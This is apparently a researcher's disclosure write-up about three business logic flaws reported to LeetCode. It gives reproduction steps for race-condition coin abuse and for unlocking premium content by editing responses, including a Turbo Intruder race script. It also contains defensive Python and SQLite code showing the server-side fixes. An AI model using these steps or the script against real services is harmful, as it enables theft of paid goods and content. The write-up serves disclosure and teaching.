From Coins to Chaos : Business Logic Exploits in LeetCode
While most people use LeetCode to sharpen their problem-solving skills, I took a different route: digging into its logic. In this blog, I'll walk you through how I found and responsibly reported three impactful business logic vulnerabilities in LeetCode's main application, leetcode.com. Each case involved clever misuse of logic, and none required complex technical exploits, just a clear understanding of how things shouldn't work.
🧩 Case 1: Infinite Redemptions with Limited LeetCoins
📌 Description
LeetCode offers a store where users can redeem items using "leetcoins." Logically, if you have 70 leetcoins, you should only be able to redeem one item worth that amount. But due to a race condition in the redemption flow, I was able to redeem multiple items with the same coin balance.
💥 Exploit Summary
By intercepting the redemption request and launching it concurrently using Turbo Intruder, I was able to bypass redemption limits.
🛠 Steps to Reproduce
- Start with 70 leetcoins.
- Intercept the redemption request via any proxy tools.
- Send it to Turbo Intruder with this script:

    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=50,
                               requestsPerConnection=50,
                               pipeline=False)
        # Queue 50 copies of the intercepted request behind one gate,
        # then open the gate so they all leave at the same moment.
        for i in range(50):
            engine.queue(target.req, target.baseInput, gate='race1')
        engine.openGate('race1')
        engine.complete(timeout=60)

    def handleResponse(req, interesting):
        table.add(req)
- Execute and observe that multiple items get redeemed.
🎯 Impact
- Bypasses monthly limits (e.g. more than 3 time-travel tickets).
- Can be extended to perks or premium subscriptions.
- Financial implications for LeetCode.
🔓 Case 2: Free Access to Premium Content
📌 Description
LeetCode offers premium problems with paid access. However, using a clever frontend trick, I was able to access premium descriptions, discussions, and solutions.
🛠 Steps to Reproduce
- Use a non-premium account.
- Visit any premium problem (e.g. Word-Squares).
- Intercept and modify the response: set all parameters to true, except "isPaidOnly", which is set to false.
- To reveal the problem description, add a note to the problem.
- Go to your notes section and enable “Show Description.”
🎯 Impact
- Unauthorized viewing of premium content.
- Could lead to public leaks and financial damage.
- Involves only frontend manipulation; there is no backend authorization check.
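The fix for this case is not to hide premium text on the client but to never send it to a non-premium account in the first place, and to run the same authorization decision in every feature that can expose the text (the problem page and the notes view alike). The following is an added illustration in Python, not LeetCode's code; the data model, the `can_view` function, the handler names and the sample problems are constructed for the demo.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class Question:
    slug: str
    paid_only: bool
    description: str  # constructed placeholder text, not real problem content


@dataclass(frozen=True)
class User:
    name: str
    premium: bool


# Constructed sample data for the demo.
QUESTIONS = {
    "two-sum": Question("two-sum", False, "FREE problem text"),
    "word-squares": Question("word-squares", True, "PREMIUM problem text"),
}


def can_view(user, q):
    """The single server-side authorization decision for problem text."""
    return (not q.paid_only) or user.premium


def question_vulnerable(user, slug):
    """Anti-pattern: ship the whole record and let the frontend gate it with isPaidOnly."""
    q = QUESTIONS[slug]
    return {"slug": q.slug, "isPaidOnly": q.paid_only, "content": q.description}


def question_safe(user, slug):
    """Hardened: the flag is still sent for the UI, but the text is omitted unless authorized."""
    q = QUESTIONS[slug]
    payload = {"slug": q.slug, "isPaidOnly": q.paid_only, "content": None}
    if can_view(user, q):
        payload["content"] = q.description
    return payload


def note_with_description_safe(user, slug, note_text):
    """The notes view reuses can_view, so 'Show Description' cannot become a side door."""
    q = QUESTIONS[slug]
    return {"note": note_text, "description": q.description if can_view(user, q) else None}


def frontend_render(payload):
    """Mimics a client that trusts the isPaidOnly flag to decide what to display."""
    return payload["content"] if not payload["isPaidOnly"] else "[locked]"


def tampered(payload):
    """Simulates the response edit from the write-up: isPaidOnly flipped to false in transit."""
    p = json.loads(json.dumps(payload))
    p["isPaidOnly"] = False
    return p


def leaks_to_free_user(slug, handler):
    """True if a free account that flips the flag ends up seeing the problem text."""
    free = User("free-user", premium=False)
    return frontend_render(tampered(handler(free, slug))) == QUESTIONS[slug].description


if __name__ == "__main__":
    print("vulnerable handler leaks:", leaks_to_free_user("word-squares", question_vulnerable))
    print("safe handler leaks:", leaks_to_free_user("word-squares", question_safe))
```

With the safe handler, editing the response changes only what the browser is told about the flag; the premium text was never in the body, so there is nothing to reveal, and the notes endpoint applies the identical rule rather than its own.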
🪙 Case 3: Free LeetCoins via Profile Update Race Condition
📌 Description
By editing basic profile info (like name or gender) concurrently, I triggered a condition where the application granted leetcoins multiple times for a single update.
🛠 Steps to Reproduce
- Create a LeetCode account.
- Go to the Edit Profile section.
- Intercept the request and send it to Turbo Intruder.
- Use this script:

    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=50,
                               requestsPerConnection=50,
                               pipeline=False)
        # Queue 50 copies of the intercepted request behind one gate,
        # then open the gate so they all leave at the same moment.
        for i in range(50):
            engine.queue(target.req, target.baseInput, gate='race1')
        engine.openGate('race1')
        engine.complete(timeout=60)

    def handleResponse(req, interesting):
        table.add(req)
- Set HTTP/1.1 to HTTP/1.0 and mark the %s placeholder appropriately.
- Execute, then refresh the profile page: extra coins have been added.
🎯 Impact
- Generation of coins beyond permitted logic.
- Can be used to buy perks or affect user rankings.
- Again, financial damage for the platform.
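Cases 1 and 3 share one root cause: the server checks a condition (enough coins, reward not yet paid) in one step and changes state in a later step, so requests released through the same gate all pass the check before any of them is applied. The example below is added here and is not LeetCode's code. It uses SQLite and threads to show the read-then-write pattern failing and two server-side fixes: a conditional UPDATE that checks and debits in one atomic statement (Case 1), and a unique (user, reason) key inserted in the same transaction as the credit so a reward is paid at most once (Case 3). The schema, the wallet, the reward name and the `barrier` argument (used only to line the threads up) are constructed for the demo.

```python
import os
import sqlite3
import tempfile
import threading

# Constructed demo schema: one coin wallet per user plus a ledger of one-time rewards.
SCHEMA = """
CREATE TABLE wallets (user TEXT PRIMARY KEY, balance INTEGER NOT NULL);
CREATE TABLE reward_grants (user TEXT, reason TEXT, PRIMARY KEY (user, reason));
"""


def new_ledger(balance=70):
    """Create a temp-file SQLite database seeded with one wallet (constructed sample data)."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    conn = sqlite3.connect(path)
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO wallets VALUES (?, ?)", ("alice", balance))
    conn.commit()
    conn.close()
    return path


def connect(path):
    # Autocommit mode so transactions are explicit; the timeout makes concurrent writers
    # wait for the lock instead of failing, which is what serialises them.
    return sqlite3.connect(path, timeout=10, isolation_level=None)


def redeem_vulnerable(path, user, cost, barrier):
    """Read-then-write: the balance check and the debit are separate statements, so every
    request that reads before the first debit commits passes the check."""
    conn = connect(path)
    cur = conn.execute("SELECT balance FROM wallets WHERE user = ?", (user,))
    (bal,) = cur.fetchone()
    cur.close()
    barrier.wait()  # demo only: every request finishes its read before any debit runs
    if bal < cost:
        conn.close()
        return False
    conn.execute("UPDATE wallets SET balance = balance - ? WHERE user = ?", (cost, user))
    conn.close()
    return True


def redeem_safe(path, user, cost, barrier):
    """Check and debit in one conditional UPDATE; the database serialises writers, so at
    most balance // cost requests can ever succeed."""
    conn = connect(path)
    barrier.wait()
    cur = conn.execute(
        "UPDATE wallets SET balance = balance - ? WHERE user = ? AND balance >= ?",
        (cost, user, cost),
    )
    ok = cur.rowcount == 1  # 0 rows changed means the balance was already too low
    conn.close()
    return ok


def grant_reward_once(path, user, reason, amount, barrier):
    """Idempotent credit: the (user, reason) key and the coin credit go in one write
    transaction, so a reward is paid at most once however many profile updates race."""
    conn = connect(path)
    barrier.wait()
    conn.execute("BEGIN IMMEDIATE")  # take the write lock before consulting the ledger
    cur = conn.execute("INSERT OR IGNORE INTO reward_grants VALUES (?, ?)", (user, reason))
    granted = cur.rowcount == 1  # 0 means this reward was already recorded
    if granted:
        conn.execute("UPDATE wallets SET balance = balance + ? WHERE user = ?", (amount, user))
    conn.execute("COMMIT")
    conn.close()
    return granted


def run_concurrently(fn, n, *args):
    """Release n copies of fn at the same moment (like a gate) and collect their results."""
    barrier = threading.Barrier(n)
    results = [None] * n

    def worker(i):
        results[i] = fn(*args, barrier)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def balance(path, user):
    conn = sqlite3.connect(path)
    (bal,) = conn.execute("SELECT balance FROM wallets WHERE user = ?", (user,)).fetchone()
    conn.close()
    return bal


def demo(n=5):
    """Return (successful requests, final balance) for each pattern with n racing requests."""
    out = {}
    path = new_ledger(70)
    hits = run_concurrently(redeem_vulnerable, n, path, "alice", 70)
    out["vulnerable"] = (sum(hits), balance(path, "alice"))
    path = new_ledger(70)
    hits = run_concurrently(redeem_safe, n, path, "alice", 70)
    out["safe"] = (sum(hits), balance(path, "alice"))
    hits = run_concurrently(grant_reward_once, n, path, "alice", "profile-completed", 10)
    out["reward"] = (sum(hits), balance(path, "alice"))
    return out


if __name__ == "__main__":
    print(demo())
```

With five racing requests the read-then-write version redeems five items and drives a 70-coin wallet to -280, while the conditional UPDATE lets exactly one through and the keyed reward credits 10 coins once. A CHECK (balance >= 0) constraint on the wallet column is a cheap second line of defence that turns any remaining double-spend into a database error rather than a negative balance.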
🔍 Takeaways
- Business logic flaws are powerful. They exploit what the app allows—not what it protects.
- Race conditions can occur in unexpected places. Backend validation is a must.
- Always check what a user is allowed to do logically, not just technically.
Timeline
- Cases Submission - 23-May-2024
- Reports Triaged - 28-May-2024
- Resolution - 07-Oct-2024
My personal thoughts for LeetCode and security researchers …
- For security researchers: Please do not try to perform security research on LeetCode infrastructure. My overall experience with this team is horrible, and they offer leetcoins as a return on your investment. So don't expect anything in return.
- For LeetCode: Very unprofessional. The Dev/Sec team takes a huge amount of time to resolve a case (~6 months), and the company did not offer any LoA, swag or anything to a security researcher who helped save them from a major financial loss. If I wanted, I could mine millions of leetcoins easily and make a lot of money by unethically selling them or redeeming any swag/goodies, well, it's LeetCode…!! (Very disappointing)